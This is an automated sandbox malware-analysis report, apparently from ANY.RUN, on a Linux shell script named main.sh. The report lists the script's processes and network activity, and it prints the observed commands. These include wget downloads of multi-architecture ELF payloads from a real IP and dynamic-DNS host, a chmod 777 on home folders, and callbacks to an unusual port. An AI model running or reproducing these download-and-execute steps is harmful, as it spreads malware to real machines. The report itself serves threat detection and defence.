File name: main.sh
Full analysis: https://app.any.run/tasks/c2f72dad-bb89-4409-9557-12cf81ae0578
Verdict: Malicious activity
Analysis date: June 21, 2025, 21:34:22
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: 041FD7CD861D6AD38485C1E783EC10B3
SHA1: 2BE77942D3CB68D4B2116D5E29AD4AE446019F98
SHA256: EE58E06CE6F1DF21CE9A75D8601F0027F32585340978ED1E4DCE1C4746ECC468
SSDEEP: 12:EkJJMcdkqyEkJJMcdT1qy/akJJMcCqzkJJMca6qoahkJJMcYqx:7JJbREJJbimhJJbVgJJb8TuJJbbx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • main_x86 (deleted) (PID: 41401)
      • main_x86 (PID: 41400)
      • main_x86 (deleted) (PID: 41403)
      • main_x86_64 (PID: 41409)
      • main_x86_64 (deleted) (PID: 41410)
      • main_x86_64 (deleted) (PID: 41412)
  • SUSPICIOUS

    • Starts itself from another location

      • main_x86 (PID: 41400)
      • main_x86_64 (PID: 41409)
    • Modifies file or directory owner

      • sudo (PID: 41392)
    • Executes commands using command-line interpreter

      • sudo (PID: 41395)
      • bash (PID: 41396)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 41396)
    • Uses wget to download content

      • bash (PID: 41396)
    • Potential Corporate Privacy Violation

      • wget (PID: 41398)
      • wget (PID: 41407)
      • wget (PID: 41427)
      • wget (PID: 41435)
      • wget (PID: 41414)
    • Connects to unusual port

      • main_x86_64 (deleted) (PID: 41410)
      • main_x86 (deleted) (PID: 41401)
  • INFO

    • Checks timezone

      • wget (PID: 41398)
      • wget (PID: 41407)
      • wget (PID: 41414)
      • wget (PID: 41427)
      • wget (PID: 41435)
No Malware configuration.
No data.
Total processes: 168
Monitored processes: 36
Malicious processes: 5
Suspicious processes: 2

Behavior graph

dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget chmod no specs main_x86 no specs rm no specs main_x86 (deleted) bash no specs wget main_x86 (deleted) no specs chmod no specs main_x86_64 no specs rm no specs bash no specs main_x86_64 (deleted) main_x86_64 (deleted) no specs wget tracker-extract-3 no specs chmod no specs bash no specs rm no specs bash no specs wget chmod no specs bash no specs rm no specs bash no specs wget chmod no specs bash no specs rm no specs

Process information

PID: 41391
CMD: /bin/sh -c "sudo chown user /tmp/main\.sh && chmod +x /tmp/main\.sh && DISPLAY=:0 sudo -iu user /tmp/main\.sh "
Path: /usr/bin/dash
Parent process: UbvyYXL4x2mYa65Q
User: root
Integrity Level: UNKNOWN
Exit code: 0
Loaded images:
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41392
CMD: sudo chown user /tmp/main.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Loaded images:
  /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  /usr/lib/x86_64-linux-gnu/libselinux.so.1
  /usr/libexec/sudo/libsudo_util.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libc.so.6
  /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  /usr/libexec/sudo/sudoers.so
  /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41393
CMD: chown user /tmp/main.sh
Path: /usr/bin/chown
Parent process: sudo
User: root
Integrity Level: UNKNOWN
Exit code: 0
Loaded images:
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41394
CMD: chmod +x /tmp/main.sh
Path: /usr/bin/chmod
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Loaded images:
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41395
CMD: sudo -iu user /tmp/main.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Loaded images:
  /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  /usr/lib/x86_64-linux-gnu/libselinux.so.1
  /usr/libexec/sudo/libsudo_util.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libc.so.6
  /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  /usr/libexec/sudo/sudoers.so
  /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41396
CMD: -bash --login -c \/tmp\/main\.sh
Path: /usr/bin/bash
Parent process: sudo
User: user
Integrity Level: UNKNOWN
Exit code: 0
Loaded images:
  /usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41397
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Loaded images:
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41398
CMD: wget http://41.216.188.159/main_x86
Path: /usr/bin/wget
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Loaded images:
  /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  /usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
  /usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
  /usr/lib/x86_64-linux-gnu/libssl.so.3
  /usr/lib/x86_64-linux-gnu/libcrypto.so.3
  /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
  /usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
  /usr/lib/x86_64-linux-gnu/libc.so.6
  /usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0

PID: 41399
CMD: chmod 777 Desktop Documents Downloads main_x86 Music Pictures Public snap Templates test_files Videos
Path: /usr/bin/chmod
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Loaded images:
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41400
CMD: ./main_x86
Path: /home/user/main_x86
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Executable files: 0
Suspicious files: 4
Text files: 0
Unknown types: 1

Dropped files

PID    Process  Filename                          Type
41398  wget     /home/user/main_x86 (deleted)     o
41407  wget     /home/user/main_x86_64 (deleted)  o
41414  wget     /home/user/main_arm               binary
41427  wget     /home/user/main_arm7              binary
41435  wget     /home/user/main_m68k              o

The MD5 and SHA256 fields for all five dropped files are empty in the report.
HTTP(S) requests: 6
TCP/UDP connections: 246
DNS requests: 242
Threats: 239

HTTP requests

PID    Process  Method  HTTP Code  IP                  URL                                    CN       Reputation
-      -        GET     204        185.125.190.96:80   http://connectivity-check.ubuntu.com/  unknown  whitelisted
41398  wget     GET     200        41.216.188.159:80   http://41.216.188.159/main_x86         unknown  unknown
41407  wget     GET     200        41.216.188.159:80   http://41.216.188.159/main_x86_64      unknown  unknown
41414  wget     GET     200        41.216.188.159:80   http://41.216.188.159/main_arm         unknown  unknown
41427  wget     GET     200        41.216.188.159:80   http://41.216.188.159/main_arm7        unknown  unknown
41435  wget     GET     200        41.216.188.159:80   http://41.216.188.159/main_m68k        unknown  unknown

The Type and Size columns are empty for every request in the report.

Connections

PID    Process             IP                   Domain                         ASN                                CN  Reputation
-      -                   185.125.190.98:80    connectivity-check.ubuntu.com  Canonical Group Limited            GB  whitelisted
-      -                   185.125.190.97:80    connectivity-check.ubuntu.com  Canonical Group Limited            GB  whitelisted
484    avahi-daemon        224.0.0.251:5353     -                              -                                  -   unknown
-      -                   185.125.190.96:80    connectivity-check.ubuntu.com  Canonical Group Limited            GB  whitelisted
1178   snap-store          212.102.56.179:443   odrs.gnome.org                 Datacamp Limited                   DE  whitelisted
512    snapd               185.125.188.59:443   api.snapcraft.io               Canonical Group Limited            GB  whitelisted
512    snapd               185.125.188.57:443   api.snapcraft.io               Canonical Group Limited            GB  whitelisted
512    snapd               185.125.188.58:443   api.snapcraft.io               Canonical Group Limited            GB  whitelisted
41398  wget                41.216.188.159:80    vagner.sytes.net               Private-Hosting di Cipriano oscar  DE  suspicious
41401  main_x86 (deleted)  41.216.188.159:1995  vagner.sytes.net               Private-Hosting di Cipriano oscar  DE  suspicious

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • (resolved address list omitted)
whitelisted
google.com
  • 142.250.184.206
  • 2a00:1450:4001:81d::200e
whitelisted
odrs.gnome.org
  • (resolved address list omitted)
whitelisted
api.snapcraft.io
  • (resolved address list omitted)
whitelisted
vagner.sytes.net
  • 41.216.188.159
unknown
14.100.168.192.in-addr.arpa
unknown

Threats

PID    Process                Class                                  Message
41401  main_x86 (deleted)     Potentially Bad Traffic                ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41398  wget                   Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41410  main_x86_64 (deleted)  Potentially Bad Traffic                ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41407  wget                   Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41401  main_x86 (deleted)     Potentially Bad Traffic                ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41414  wget                   Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41410  main_x86_64 (deleted)  Potentially Bad Traffic                ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41427  wget                   Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41401  main_x86 (deleted)     Potentially Bad Traffic                ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41410  main_x86_64 (deleted)  Potentially Bad Traffic                ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
No debug info